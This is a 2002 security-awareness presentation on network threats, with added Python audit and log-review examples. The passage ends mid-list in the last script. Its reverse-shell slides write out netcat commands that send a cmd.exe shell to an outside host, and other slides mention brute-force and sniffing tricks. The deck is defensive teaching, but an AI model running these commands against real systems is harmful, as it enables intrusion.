Analysts International
Modern Threats to Information Infrastructure
V1.0 11-20-02

Introductions
• Mark Lachniet from Analysts International, Sequoia Services Group
• Senior Security Engineer and Security Services technical lead
• Former I.S. director for Holt Public Schools
• Certified Information Systems Security Professional (CISSP)
• Microsoft MCSE, Novell Master CNE, Linux LPI Certified LPIC-1, Check Point Certified CCSE, TruSecure TICSA, etc.

Agenda
• Windows 2000 Active Directory
• Peer to Peer file sharing
• Instant Messaging
• Bug Bear
• Wireless
• Reverse command shells
• HTTP Tunneling / GoToMyPC.com
• Round table – Q&A – Brainstorming

Active Directory Overview
• Active Directory is the directory service for Win2k
• NT 4.0 domains simply did not scale very well in large organizations; A.D. is distributed
• By default, all of the old NetBIOS stuff is still running, but there are new capabilities
• Improves management, especially with user and machine policies, delegation of authority functions, and integrated software such as Exchange
• Tight integration with DNS (Dynamic DNS)
• Tight integration with LDAP (Lightweight Directory Access Protocol)
• Integration with Kerberos (authentication)

Hierarchical Directories
(diagram slide)

Pre-Win2k Compatibility Mode
• Is required for a variety of backwards-compatibility features
• Is probably enabled in your environment unless you are ALL Windows 2000
• Allows access to all of the information you used to get via NetBIOS (shares, users, etc.)
• An Active Directory server will emulate a PDC for Windows NT4 type environments and systems
• If selected, the "everyone" group is given permission to read the directory, etc. (just like NT4), and hence anonymous access is allowed
• Will be required to interoperate with various products such as UNIX Samba, NT 4.0 RAS servers, etc.

A.D. Default Configuration
• Logging of A.D. activity is disabled by default
• Also, authenticated users are able to enumerate the entire directory
• In a large company, you may wish to lock down your directory so that users in an OU (such as engineering) cannot enumerate objects in another OU (such as internal auditing)
• For details on how to lock down this browsing of OUs and A.D. information check out: www.microsoft.com/serviceproviders/deployment/SP_AD_Architecture_Configuration.doc

A.D. and Security Policies
• Although not discussed in this presentation, A.D. is the means by which security policy is passed down to workstations and users
• Policies are applied per domain (and per OU within it); a domain may be an entire A.D. tree or just a sub-component of it (the relationship between A.D. and domains may be murky at first glance)
• Lots of information is available on the Internet about the config and use of policies
• I suggest that you refer to the NSA security guides on this topic: http://www.nsa.gov/snac/index.html

Active Directory - LDAP
• Based on the X.500 Directory Access Protocol, and is similar to Novell NDS and other X.500 compliant directories in terms of naming conventions, etc.
• Win2k supports LDAP v2 and v3
• Should be compatible with other LDAP implementations, both server and client
• Runs on TCP/389 (LDAP over SSL on TCP/636, and the global catalog on TCP/3268) – you should portscan your internal and external network for these ports
• Uses cleartext (simple bind) authentication by default
• v3 support includes SASL (Simple Authentication and Security Layer) authentication, which can carry NTLM or Kerberos and, with them, signing and sealing of the session
• Many client applications that access LDAP stores for passwords can be forced to only use NTLM (this is a good idea)

LDAP Tricks – ADSI Edit
• ADSI Edit allows raw access to the directory – this is required for complicated operations but is also very dangerous
• Using ADSI you can do a large variety of things in an "easy" way via scripting as well as the editor
• "Active Directory Service Interfaces (ADSI) enable systems administrators and developers of scripts or C/C++ applications to easily query for and manipulate directory service objects."
• ADSI can access Active Directory, but lots of other handy stuff as well
• Extensive information on this at Microsoft's Developer Network web site (MSDN)

LDAP Tricks – ADSI Scripting
• ADSI supports many scripting capabilities:
 – Enumerating objects, finding information
 – Adding users, creating custom objects (such as an object that shows the time of last backup)
 – Finding users with specific criteria:
   • Account disabled
   • Intruder lockout
   • Password not required
   • Password can't change
 – Also the ability to *SET* information:
   • "Un-lockout" an account (handy for brute forcing a password on a specific account, isn't it?)
   • Add/remove users from a group (add as an admin, run a command, remove the user again!)
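Added example, written for this page and not taken from the deck or from Microsoft's ADSI samples: the same "find users with specific criteria" search as above, done offline in Python over an LDIF export of the directory (the format an LDAP dumper or an ADSI script writes out). The criteria on the slide are bits of the userAccountControl attribute, so the script decodes that bit field and also checks lockoutTime, which is where A.D. actually records a lockout. The LDIF text, account names, DNs and the example.com domain are constructed; the flag values are the standard ADS_USER_FLAG_ENUM constants.

```python
"""Offline triage of an Active Directory LDIF export.

Decodes userAccountControl to find the account states an ADSI search would
look for (disabled, locked out, password not required, password can't change)
plus two related flags worth hunting for during an audit.
"""
import base64
from typing import Dict, List

# userAccountControl bits (ADS_USER_FLAG_ENUM constants).
UF_ACCOUNTDISABLE = 0x0002
UF_LOCKOUT = 0x0010            # legacy bit; AD records lockouts in lockoutTime instead
UF_PASSWD_NOTREQD = 0x0020
UF_PASSWD_CANT_CHANGE = 0x0040  # in AD this is really an ACE; the bit is what ADSI exposes
UF_DONT_EXPIRE_PASSWD = 0x10000
UF_DONT_REQUIRE_PREAUTH = 0x400000

FLAG_NAMES = {
    UF_ACCOUNTDISABLE: "ACCOUNTDISABLE",
    UF_LOCKOUT: "LOCKOUT",
    UF_PASSWD_NOTREQD: "PASSWD_NOTREQD",
    UF_PASSWD_CANT_CHANGE: "PASSWD_CANT_CHANGE",
    UF_DONT_EXPIRE_PASSWD: "DONT_EXPIRE_PASSWD",
    UF_DONT_REQUIRE_PREAUTH: "DONT_REQUIRE_PREAUTH",
}


def parse_ldif(text: str) -> List[Dict[str, List[str]]]:
    """Minimal LDIF reader: folded lines, '::' base64 values, multi-valued attributes.

    Attribute names are lower-cased because LDAP treats them case-insensitively.
    """
    unfolded: List[str] = []
    for raw in text.splitlines():
        if raw.startswith(" ") and unfolded:
            unfolded[-1] += raw[1:]          # continuation of the previous line
        else:
            unfolded.append(raw)
    entries: List[Dict[str, List[str]]] = []
    current: Dict[str, List[str]] = {}
    for line in unfolded + [""]:             # trailing blank flushes the last entry
        if not line.strip():
            if current:
                entries.append(current)
                current = {}
            continue
        if line.startswith("#"):
            continue
        attr, _, value = line.partition(":")
        if value.startswith(":"):            # "attr:: <base64>"
            value = base64.b64decode(value[1:].strip()).decode("utf-8", "replace")
        else:
            value = value.strip()
        current.setdefault(attr.strip().lower(), []).append(value)
    return entries


def decode_uac(value: int) -> List[str]:
    """Names of the audit-relevant bits set in a userAccountControl value."""
    return [name for bit, name in FLAG_NAMES.items() if value & bit]


def find_weak_accounts(ldif_text: str) -> Dict[str, List[str]]:
    """Map sAMAccountName -> findings for every user entry that has something to report."""
    findings: Dict[str, List[str]] = {}
    for entry in parse_ldif(ldif_text):
        if "user" not in [c.lower() for c in entry.get("objectclass", [])]:
            continue                          # printers, groups, OUs: not accounts
        name = entry.get("samaccountname", entry.get("dn", ["?"]))[0]
        issues = decode_uac(int(entry.get("useraccountcontrol", ["0"])[0]))
        if entry.get("lockouttime", ["0"])[0] not in ("0", ""):
            issues.append("LOCKED_OUT (lockoutTime set)")
        if issues:
            findings[name] = issues
    return findings


# Constructed sample export; no real directory data.
SAMPLE_LDIF = """\
# constructed sample, example.com is a placeholder domain
dn: CN=Alice Example,OU=Engineering,DC=example,DC=com
objectClass: user
sAMAccountName: alice
userAccountControl: 512
lockoutTime: 0

dn: CN=Svc Backup,OU=Service Accounts,DC=example,DC=com
objectClass: user
sAMAccountName: svc_backup
userAccountControl: 66080
lockoutTime: 0

dn: CN=Bob Example,OU=Engineering,DC=example,DC=com
objectClass: user
sAMAccountName: bob
userAccountControl: 514

dn: CN=Carol Example,OU=Internal Auditing,DC=example,DC=com
objectClass: user
sAMAccountName:: Y2Fyb2w=
userAccountControl: 66112
lockoutTime: 132000000000000000

dn: CN=Printer01,OU=Devices,DC=example,DC=com
objectClass: printQueue
"""

if __name__ == "__main__":
    for account, issues in find_weak_accounts(SAMPLE_LDIF).items():
        print(f"{account}: {', '.join(issues)}")
```

Run against a real export, the script is the read-only half of what the slide describes; the same decoded bits are what an ADSI script would flip back (for example clearing a lockout) if it were allowed to write. Note that 512 is the plain NORMAL_ACCOUNT value and produces no finding, so a clean export prints nothing.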
LDAP Brute Force Attacks
• K0ld: http://www.phenoelit.de/kold/download.html
• Specifically designed to attack LDAP, with support for Active Directory on Windows 2000
• Can be used to enumerate all IDs found in the directory and brute force attack them with words from a dictionary file
• Can use an anonymous connection, or log in using a given user ID and password
• Account lockout / logging of LDAP attacks (brute force, etc.) may be an issue that needs more research
• Phenoelit also has "lumberjack" which will do off-line hacking of LDAP directories (stored in LDIF format)

K0ld Screen Capture
(screenshot slide)

Ldapminer.exe on Win2k
• Allows full enumeration of the data contained within LDAP (Active Directory)
• Can dump all of the data discovered to a text file for later analysis in LDIF format (see last slide – lumberjack)
• Default Windows 2000 configuration will reveal some useful information:
 – Current system time
 – X.500 naming (may indicate corporate config)
 – DNS names and IP addresses (including internal)
 – Whether it is a global catalog (implies the 1st AD server, but may have implications for Exchange or other penetration testing)

A.D. and L0phtCrack
• L0phtCrack *will* work on Windows 2000 Active Directory information
• Uses PWDUMP3 to extract the hashes, as long as you have admin access
• Can access the hashes across the network, and may not require physical access
• All of your favorite auditing tricks should still work fine with L0phtCrack, but you will need admin access
• One significant change is that on a domain controller the domain accounts no longer live in the SAM file but in the A.D. database (NTDS.DIT), so booting to a floppy disk and grabbing the SAM no longer yields the entire domain account list (an offline copy of NTDS.DIT is the equivalent target)
• One trivia fact – did you know that L0phtCrack cannot crack high-bit characters (such as ALT-keypad 0,1,2)

A.D. and Kerberos
• Kerberos is the updated authentication system for Windows 2000
• Kerberos is an open standard, and other implementations exist (and are somewhat compatible with Win2k)
• Windows 2000 clients will attempt to use Kerberos by default, and will fall back to lesser authentication systems (such as NTLMv2) if there are problems
• In Kerberos, a "realm" is a logical authentication boundary, which correlates 1:1 with a Windows domain
• This means that a Kerberos realm does not necessarily map to an entire Active Directory tree
• Be aware of this relationship, especially if you interoperate with UNIX systems, etc.

A.D. and Dynamic DNS
• Windows Active Directory relies on Dynamic DNS
• There is a logical link between DNS naming and the directory structure
• Windows 2000 clients will register their DNS name (e.g. workstation.isaca.org) with their current IP address by means of the DHCP Client service (it does this even for statically addressed machines)
• Dynamic DNS supports secure and insecure updates – if you rely on DNS naming for important security functions this should be researched
• Dynamic DNS is handy for auditors to find workstations in a DHCP environment, but it is also useful for hackers
• One personal observation is that the Dynamic DNS information is exposed in the LDAP directory, even to unauthenticated users.
• Also, keep in mind that DNS may allow for zone transfers, enumeration and other reconnaissance

Active Directory Auditing
• You must manually enable logging and auditing for Active Directory
• Enable auditing of all failed accesses of Active Directory as well as logins, etc.
• For very granular auditing (possibly through scripts or for troubleshooting purposes) use DSACLS and ACLDIAG
• DSACLS.EXE "facilitates management of access control lists (ACLs) for directory services. DsAcls enables you to query and manipulate security attributes on Active Directory objects. It is the command-line equivalent of the Security page on various Active Directory snap-in tools"

Active Directory Auditing
• With ACLDIAG.EXE you can:
 – Compare the ACL on a directory services object to the permissions defined in the schema defaults
 – Check or fix standard delegations performed using templates from the Delegation of Control wizard in the Active Directory Users and Computers snap-in, a Windows 2000 administrative tool
 – Get effective permissions granted to a specific user or group, or to all users and groups that show up in the ACL

Theoretical Attacks on Active Directory
• According to the SANS writeup (see references), one dangerous possibility is embedding binary "blobs" in the directory that are executed by MMC
• Denial of Service – rapidly changing large numbers of objects, and then setting them as being high priority (critical) for replication
• Use of A.D. as a virus distribution system
• Modifying the schema in an inappropriate way
• Deeply nested OU objects?
• Mysterious problems – in testing, my LDAP server frequently froze up while using standard tools

Backing up Active Directory
• In order to have AD security, you should make sure that it is properly backed up
• Restoring AD can be challenging and complicated – make sure you have researched it before you try
• Backing up the Active Directory also includes backing up system state data files. System state data includes:
 – Active Directory
 – Certificate services database (if a certificate server)
 – Class registration (database of information about the component services)
 – Cluster service (if installed)
 – Performance counter configuration
 – Registry
 – Sysvol (shared folder that contains group policy templates and login scripts)
 – System startup files
Active Directory References
• SecurityFocus articles on A.D.:
 http://online.securityfocus.com/infocus/1292
 http://online.securityfocus.com/infocus/1293
 http://online.securityfocus.com/infocus/1470
 http://online.securityfocus.com/infocus/1509
 http://online.securityfocus.com/infocus/1535
• Preventing L0phtCrack attacks on A.D.: http://rr.sans.org/win2000/l0phtcrack.php

More A.D. References
• A comparison of NT4 domains and Win2k A.D.: http://www.microsoft.com/mspress/books/sampchap/3173.asp
• How to set up auditing of Active Directory: http://www.softheap.com/security/audit-active-directory-4.html
• Using LDP to find data in Active Directory: http://support.microsoft.com/default.aspx?scid=KB;en-us;q224543
• Discussion on Pre-Windows 2000 Compatibility Mode: http://support.microsoft.com/default.aspx?scid=KB;en-us;q257988

Peer to Peer File Sharing
• Several different networks and clients:
 – Aimster
 – FastTrack
 – iMesh
 – Audiogalaxy
 – MFTP
 – NeoModus
 – Gnutella
 – OpenNap

Peer to Peer File Sharing
• The most popular network by far is Gnutella
• Gnutella has many different clients including:
 – BearShare*
 – Gnucleus
 – GTK-Gnutella
 – LimeWire
 – Mactella
 – Morpheus*
 – Phex
 – Qtella
 – Shareaza*
 – XoLoX
• Different clients have different features, systems and risks

P2P File Sharing History
• Napster was the first successful and important one, but Napster made one mistake
• Napster used centralized servers that were under their control
• Hence the system could be shut down by going after Napster with legal action
• Newer systems have "master" nodes, but all they do is maintain lists of other peers out on the network
• Master nodes are replaceable – you could start your own P2P network by setting up your own master servers

Napster-Style P2P
• This wasn't too bad; at least you knew what to block
(diagram slide)

Gnutella Style P2P
• This is *bad* for you because there is no single choke point to cut off
(diagram slide)

P2P File Share Features
• Keyword searching
• Rate limiting / Quality of Service (via bandwidth or simultaneous upload and download limits)
• Request queuing at the serving host
• Chat facilities
• Use SHA hashes of files to uniquely ID them:
 – SHA hashes are unique per file content, not per file name
 – IDs files that are the same but have different names
 – Allows for "swarm" downloads where parts of the same file are downloaded from multiple sources simultaneously (cool)
 – Allows for file resumption if a source is unavailable (turned off, hung up, etc.)
 – Allows a patient person to get almost anything they can find listed

Gnutella Communications
• Uses 5 distinct types of protocol messages: ping, pong, query, query reply (query hit), and push
• Use Shareaza to get a good protocol analyzer / decoder to see them
• Ping and Pong discovery – ask who is out there; the pong returns the responder's IP address, port and amount of shared files
• Query and Query reply – the query gives search terms (keywords) and a minimum bandwidth requirement. The reply gives the responding host's IP address, port, speed, matching files and its servent GUID (which a later push message uses to name it)
• Querier then connects directly to the serving host and attempts to download the file with a plain HTTP GET (this will break if the server is behind a firewall)
• The Push message is sent if the querier cannot connect to the server to download the data

Push – Firewall Circumvention
• Sends the querier's IP and port number and asks the file host to push the file to it, so the firewalled host opens the connection outbound – this will bypass a single firewall in the mix
• If both parties are behind a firewall you are probably safe… for now…
• How can you stop it? Use a firewall to block *all* outgoing communications
• Require a proxy server to mediate all requests outwards (Squid, MS Proxy, BorderManager)
• It's only a matter of time before P2P clients can tunnel within HTTP requests that are "proxy friendly"
• Can already be done with special (but thankfully complicated) HTTP tunneling software
• For Gnutella, you can block the "root" servers but an alternate could always be used

P2P File Share Security Risks
• Spyware Spyware Spyware!
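Added example, written for this page rather than taken from the deck or from any Gnutella client: a Python decoder for the five descriptor types on the Gnutella Communications slide, following the Gnutella 0.4 wire format (23-byte header of 16-byte descriptor ID, payload type, TTL, hops and little-endian payload length; pong, query, query hit and push payloads laid out as in that specification). The sample stream, the addresses 10.1.2.3 and 198.51.100.9, the file name and the servent IDs are constructed. The last function answers the question the push slide raises: from a captured stream, which outbound connections would this servent open if it honoured the pushes addressed to it.

```python
"""Gnutella 0.4 descriptor decoder with a push-message check."""
import socket
import struct
from typing import Any, Dict, List

HEADER = struct.Struct("<16sBBBI")   # descriptor ID, payload type, TTL, hops, payload length
PING, PONG, PUSH, QUERY, QUERY_HIT = 0x00, 0x01, 0x40, 0x80, 0x81
TYPE_NAMES = {PING: "ping", PONG: "pong", PUSH: "push", QUERY: "query", QUERY_HIT: "query_hit"}


def _cstring(buf: bytes, off: int):
    """Read a NUL-terminated string starting at off; return (text, offset after the NUL)."""
    end = buf.index(b"\0", off)
    return buf[off:end].decode("latin-1"), end + 1


def parse_payload(ptype: int, p: bytes) -> Dict[str, Any]:
    """Decode one payload; IPs are 4 raw bytes in network order, other fields little-endian."""
    if ptype == PING:
        return {}
    if ptype == PONG:
        port, ip, files, kbytes = struct.unpack_from("<H4sII", p)
        return {"ip": socket.inet_ntoa(ip), "port": port, "files": files, "kbytes": kbytes}
    if ptype == QUERY:
        (min_speed,) = struct.unpack_from("<H", p)
        criteria, _ = _cstring(p, 2)
        return {"min_speed": min_speed, "criteria": criteria}
    if ptype == QUERY_HIT:
        n, port, ip, speed = struct.unpack_from("<BH4sI", p)
        off, results = 11, []
        for _ in range(n):
            index, size = struct.unpack_from("<II", p, off)
            name, off = _cstring(p, off + 8)
            _, off = _cstring(p, off)        # per-result extension block, also NUL-terminated
            results.append({"index": index, "size": size, "name": name})
        # The responder's servent ID is always the last 16 bytes; a push names it by this ID.
        return {"ip": socket.inet_ntoa(ip), "port": port, "speed": speed,
                "results": results, "servent_id": p[-16:].hex()}
    if ptype == PUSH:
        servent_id, index, ip, port = struct.unpack_from("<16sI4sH", p)
        return {"servent_id": servent_id.hex(), "index": index,
                "push_to": f"{socket.inet_ntoa(ip)}:{port}"}
    return {"raw": p.hex()}


def parse_stream(data: bytes) -> List[Dict[str, Any]]:
    """Split a byte stream into descriptors and decode each one."""
    msgs, off = [], 0
    while off + HEADER.size <= len(data):
        guid, ptype, ttl, hops, plen = HEADER.unpack_from(data, off)
        off += HEADER.size
        payload = data[off:off + plen]
        if len(payload) != plen:
            raise ValueError("truncated descriptor")
        off += plen
        msg = {"type": TYPE_NAMES.get(ptype, hex(ptype)), "ttl": ttl, "hops": hops, "guid": guid.hex()}
        msg.update(parse_payload(ptype, payload))
        msgs.append(msg)
    return msgs


def pushes_for(msgs: List[Dict[str, Any]], my_servent_id_hex: str) -> List[str]:
    """Targets this servent would open an outbound TCP connection to if it honoured the pushes."""
    return [m["push_to"] for m in msgs if m["type"] == "push" and m["servent_id"] == my_servent_id_hex]


def build(ptype: int, payload: bytes, guid: bytes = b"\x11" * 16, ttl: int = 7, hops: int = 0) -> bytes:
    return HEADER.pack(guid, ptype, ttl, hops, len(payload)) + payload


SERVENT_ID = bytes(range(16))   # constructed ID of the (firewalled) file host


def sample_stream() -> bytes:
    """Constructed capture: ping, pong, query, query hit, and the push that follows a failed download."""
    host_ip = socket.inet_aton("10.1.2.3")          # file host behind a firewall
    querier_ip = socket.inet_aton("198.51.100.9")   # querier on the Internet
    pong = struct.pack("<H4sII", 6346, host_ip, 120, 4096)
    query = struct.pack("<H", 56) + b"metallica mp3\0"
    hit = (struct.pack("<BH4sI", 1, 6346, host_ip, 1500)
           + struct.pack("<II", 7, 4096000) + b"metallica.mp3\0\0" + SERVENT_ID)
    push = struct.pack("<16sI4sH", SERVENT_ID, 7, querier_ip, 6346)
    return (build(PING, b"") + build(PONG, pong, hops=1) + build(QUERY, query)
            + build(QUERY_HIT, hit, hops=2) + build(PUSH, push))


if __name__ == "__main__":
    decoded = parse_stream(sample_stream())
    for m in decoded:
        print(m)
    print("would connect out to:", pushes_for(decoded, SERVENT_ID.hex()))
```

The push descriptor carries no file data, only the servent ID of the host that should send and the address it should send to; that is exactly why a single outbound-permissive firewall in front of the file host does not stop the transfer.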
• Usually no virus scanning is done – you need to do your own
• Spoofed servers will cough up Trojans for almost any simple query (like the Benjamin worm)
• Sharing of more than you intended
• "Transit" sharing of naughty files has been hinted at!
• Security holes (intentional or not) in the software itself
• Program minimizes (not shuts down) when exited
• P2P-specific worms (e.g. the "Gnutella worm")
• Content problems and liability!
• Bandwidth leeching

Future P2P Risks
• A lot of things about P2P are "dicey" but haven't yet been exploited
• For example, the GUID is a unique identifier that is sometimes based on the MAC address (pre-Win2k, it is said)
• That means that queries can possibly be tracked to a unique physical workstation
• A monitoring station could also record queries by GUID/MAC as well as IP address and attempt to ascertain information about that user (such as sexual preferences, areas of interest, etc.)
• Great possibility for leveraging the P2P network as Denial of Service zombies by tricking all Gnutella clients into flooding a host (e.g. whitehouse.gov)

P2P "NG" Share Sniffer
• Operates under the creed of "who needs Napster when you have Windows"
• Scans a subnet for "open" Windows shares and creates a database of them
• These open shares are then used as the storage repositories for various types of files
• This product used to be at sharesniffer.com but is gone now. I wonder why
• This was allegedly going to be a pay service!
• Due to the lack of awareness on the part of home users, this will probably work quite well

Instant Messaging
• IM is everywhere, including my cell phone! (although I don't use it)
• Over 81 MILLION users
• Check out: http://www.infosecuritymag.com/2002/aug/cover.shtml
• Various types of clients: AOL, ICQ, Microsoft .NET Messenger, Yahoo Messenger, etc.
• Specifically designed to get around firewalls in order to work
• Require servers for some functions (login, user lookup) but can talk directly to nodes for some things (such as file transfers)
(diagram slide)

Problems with IM
• Bypasses gateway AntiVirus products
• Typically unencrypted
• Security problems in the software itself – many previous hacks, probably many more to come
• May allow remote control of machines inside the firewall
• Ability to send files, URLs, etc. to individuals
• Hard to stop at the firewall
• Hard to track, log and account for
• No robust authentication systems
• Secure IM costs $$ and may require an ongoing service contract or your own server

Instant Messaging Problems Case in Point – msgsnarf
• Dug Song released a number of network sniffing tools at http://monkey.org/~dugsong/dsniff
• These are especially interesting because of their special features!
• One feature is that it will work on a switch by using "ARP poisoning" (the arpspoof tool), such that even switched networks are vulnerable to sniffing
• Another feature is the inclusion of application-specific sniffers such as mailsnarf (all SMTP messages), webspy (all URLs) and msgsnarf (Instant Message information)
• This might have a "white-hat" application, actually, if you need to monitor it

IM Management Techniques
• Use an IDS to alert you to matching traffic (and then go gently inform the user)
• Block access to the login servers and ports (refer to Infosecurity Magazine's August issue for details)
• Tightly control the workstation using imaging and desktop security products
• Require the use of proxy servers (only works in some cases – disable CONNECT on the proxy, otherwise the client simply tunnels through it)
• Use a specialized product to manage and control the access such as Akonix – this product can log and control IM and P2P software

Bug Bear
• Known as W32.Bugbear or I-Worm.Tanatos
• Some key subject lines:
 – "bad news"
 – "Membership Confirmation"
 – "Market Update Report"
 – "Your Gift"
• Replicates through the address book
• Copies itself to available network shares, including printers! (if you see binary garbage coming out of a printer, this may be a sign)
• Includes Trojan software:
 – Disables AntiVirus software
 – Built-in key-logger
 – Back door software

Bug Bear
• Exploits an OLD (May 16, 2001) bug in IE and Outlook, addressed by MS01-027
• Copies several files to the filesystem and then runs them at each startup by modifying the registry: HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
• Runs a keylogger that sends all of your keystrokes (including passwords) to one of 22 different e-mail addresses
• Creates a trojan / backdoor that listens on TCP port 36794 – you might want to check firewall logs for that
• Also has its own web server that it can start up remotely to abuse a system

Wireless
• Yes, wireless is insecure… especially anything you purchased more than 6 months ago and didn't protect with another means of security (like a VPN)
• Until recently, the only security that you could get from wireless Access Points (APs) was Wired Equivalent Privacy (WEP)
• WEP comes in 64-bit and 128-bit flavors, neither of which will do you any good at all if someone really wants to get you
• Newer products have much better security and support for better authentication systems (including bi-directional authentication to minimize the risk of "rogue" access points)

Wireless
• Wardriving – people think it's fun, it's cheap, and in some cases a sport
• Wireless leaks – connections can be made from physical locations outside of your control by using special hardware and software
• Omnidirectional magnetic-mount antennas, directional antennas, and even Pringles cans do a pretty good job of picking up signals you never thought possible
• Not only can anyone find your network, but they can (probably) tell what your SSID is, whether you use WEP, and which vendor your equipment is from

Wireless
• Above and beyond that, modern software integrates with a GPS over a serial port to record the longitude and latitude of your AP
• When posted on the Internet, your dirty laundry is aired out for all to see
• Check out http://www.netstumbler.com for lots of great information
• Try it out yourself, you may be surprised
• War driving is not, in itself, illegal! However, if you ever use an AP without permission, that is over the line.

From Work to Home
• 9 Access Points in 15 Minutes
(map slide)

Wireless Security Measures
• There are many things you can do
• Put access points on a special DMZ segment on a firewall and restrict traffic
• Require users to use a VPN client to access internal resources
• Use a modern authentication system such as 802.1X (in Windows XP) and/or LEAP
• These systems require a successful authentication (for example against a RADIUS server) before the access point will pass a client's traffic onto the network
• Can also require MUTUAL authentication between the AP and client in addition to user authentication
• If this didn't exist, you could use a MitM (Man in the Middle) attack to get auth info by setting up your own "rogue" AP

Wireless Security Measures
• Regularly scan and war-drive your own facilities and campuses
• Consider tuning an IDS for wireless attack signatures (there was a recent article on this)
• Consider putting up a wireless honeypot system
• Consider using a wireless "flooding" system that sends out huge quantities of random Access Point information to confuse (and delight) war drivers

Reverse Command Shells
• One would think that if you block all incoming access, it should be impossible to access internal systems
• This is only partially true, because it assumes that the client is honest
• With P2P, IM and everything else, this is clearly not the case any more – we cannot trust our users to be security minded
• Reverse command shells, e.g. the NetCat attack, are particularly scary
• Using a utility program such as NetCat, even a Windows server can be accessed from an outside server

How Reverse Shells Work
• Imagine the above scenario. lachniet.com cannot hit anything on the inside network directly because you have a firewall, a 10.X network, and no inbound Network Address Translation, but the client has outbound Internet access
(diagram slide)

How Reverse Shells Work
• Hacker runs NetCat in listen mode on port 8080 on lachniet.com (nc -l -p 8080)
• Client runs NetCat with an argument of cmd.exe, which connects out to lachniet.com port 8080 and attaches the input and output of cmd.exe to that connection (nc -e cmd.exe lachniet.com 8080)

How Reverse Shells Work
• The result – full access as the logged-in user
• To stop it – no outgoing access!
• Except by proxy server

HTTP Tunneling
• It used to be that a firewall, when properly configured, would stop clients from doing naughty things (like reverse command shells)
• Ideally we would block all outgoing access, and allow only web access through an HTTP proxy server
• This is all well and good, but it is also possible to encapsulate non-HTTP data inside of HTTP requests and responses, carry it through the proxy, and unwrap it at the far end so the real application never sees the HTTP at all
• In this way, even the most paranoid countermeasures can be circumvented, including a restrictive firewall and a proxy server
• Technically speaking, it looks something like this:
(diagram slide)

HTTP Tunneling in Practice
• Client wants to run a P2P file sharing client
• Dotted lines are HTTP traffic, solid line is TCP
(diagram slide)

GoToMyPC.com
• Basically the same thing, except you are using a pay service for your HTTP tunnel termination
• The service also acts as a broker for who can connect to your PC
• Hopefully this broker is working properly and the average hacker CANNOT connect to your PC (note that I have seen some discussion of WebEx conferencing having vulnerabilities along these lines)
• You also get more control and presumably security through SSL, reporting, users and groups and such

HTTP Tunneling Counter-measures
• Block *all* outgoing traffic at a firewall, and require all traffic to go through a proxy server
• Use a firewall with strict RFC compliance (I heard of some reported success with Raptor/Symantec?)
• Make sure your proxy server doesn't allow the CONNECT verb
• Configure an IDS to sense certain types of HTTP tunneling signatures (RealSecure can detect gotomypc.com traffic signatures)
• Block all known destination servers such as those from the gotomypc.com service
• Carefully review your firewall and proxy server logs! If you see a large amount of HTTP activity going to a single host (especially one that doesn't seem legit) check it out – go browse it yourself
• Log review may be your only recourse!

Q&A and Brainstorming
Mark Lachniet, Sr. Security Engineer
CISSP, MCNE, MCSE, CCSE, LPIC-1, TICSA
Analysts International - Sequoia Services
3101 Technology Blvd. Suite A
Lansing, MI 48910
phone: 517.336.1004
fax: 517.336.1004
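Added example, written for this page and not part of the deck: a Python log-review script that turns the "carefully review your firewall and proxy server logs" advice above, together with the checks from the Bug Bear and reverse shell slides, into something you can run over exported logs. It flags any connection touching TCP 36794 (the Bug Bear backdoor port), any internal host other than the proxy connecting straight to the Internet (the nc -e cmd.exe pattern, which a proxy-only egress policy should never show as ACCEPT), CONNECT requests through the proxy, and one client making many requests to a single host (the HTTP tunnel pattern). The log line formats, the 10.0.0.0/8 internal range, the proxy address 10.1.1.10, the request threshold and every sample line are constructed assumptions; adapt the two regular expressions to whatever your firewall and proxy actually write.

```python
"""Egress log review: Bug Bear backdoor port, direct outbound connections,
proxy CONNECT, and single-host HTTP volume. Sample logs are constructed."""
import ipaddress
import re
from collections import Counter
from typing import Iterable, List, Tuple

INTERNAL = ipaddress.ip_network("10.0.0.0/8")       # assumption: the inside address space
PROXY = ipaddress.ip_address("10.1.1.10")           # assumption: the only host allowed outbound
BUGBEAR_PORT = 36794                                 # backdoor port from the Bug Bear slide
HOST_REQUEST_THRESHOLD = 50                          # assumption: tune to your environment

# Constructed firewall format: "<date> <time> ACCEPT|DROP TCP|UDP src:port -> dst:port"
FW_RE = re.compile(r"^(?P<ts>\S+ \S+) (?P<action>ACCEPT|DROP) (?P<proto>TCP|UDP) "
                   r"(?P<src>[\d.]+):(?P<sport>\d+) -> (?P<dst>[\d.]+):(?P<dport>\d+)$")
# Constructed proxy format: "<date> <time> client METHOD target status bytes"
PROXY_RE = re.compile(r"^(?P<ts>\S+ \S+) (?P<client>[\d.]+) (?P<method>[A-Z]+) "
                      r"(?P<target>\S+) (?P<status>\d{3}) (?P<bytes>\d+)$")

Finding = Tuple[str, str]   # (rule name, evidence)


def review_firewall(lines: Iterable[str]) -> List[Finding]:
    findings: List[Finding] = []
    for line in lines:
        m = FW_RE.match(line)
        if not m:
            continue                                  # unparsable line: skip, don't guess
        src, dst = ipaddress.ip_address(m["src"]), ipaddress.ip_address(m["dst"])
        if BUGBEAR_PORT in (int(m["sport"]), int(m["dport"])):
            findings.append(("bugbear-port", line))   # even a DROP is worth a look at the host
        direct_out = src in INTERNAL and dst not in INTERNAL and src != PROXY
        if m["action"] == "ACCEPT" and direct_out:
            findings.append(("direct-outbound", line))
    return findings


def _host_of(method: str, target: str) -> str:
    """Host part of a proxy request target: 'host:443' for CONNECT, a URL otherwise."""
    if method == "CONNECT":
        return target.split(":")[0]
    return re.sub(r"^https?://", "", target).split("/")[0].split(":")[0]


def review_proxy(lines: Iterable[str]) -> List[Finding]:
    findings: List[Finding] = []
    per_host: Counter = Counter()                    # (client, host) -> request count
    for line in lines:
        m = PROXY_RE.match(line)
        if not m:
            continue
        if m["method"] == "CONNECT":
            findings.append(("proxy-connect", line))
        per_host[(m["client"], _host_of(m["method"], m["target"]))] += 1
    for (client, host), n in per_host.items():
        if n >= HOST_REQUEST_THRESHOLD:
            findings.append(("single-host-volume", f"{client} made {n} requests to {host}"))
    return findings


# Constructed sample lines (203.0.113.0/24 and 198.51.100.0/24 are documentation ranges).
FW_SAMPLE = [
    "2002-11-20 09:12:01 ACCEPT TCP 10.1.1.10:3301 -> 203.0.113.10:80",     # proxy going out: fine
    "2002-11-20 09:12:05 ACCEPT TCP 10.1.5.22:1045 -> 203.0.113.10:8080",   # workstation direct to 8080
    "2002-11-20 09:12:09 DROP TCP 198.51.100.7:4421 -> 10.1.5.23:36794",     # inbound probe for the backdoor
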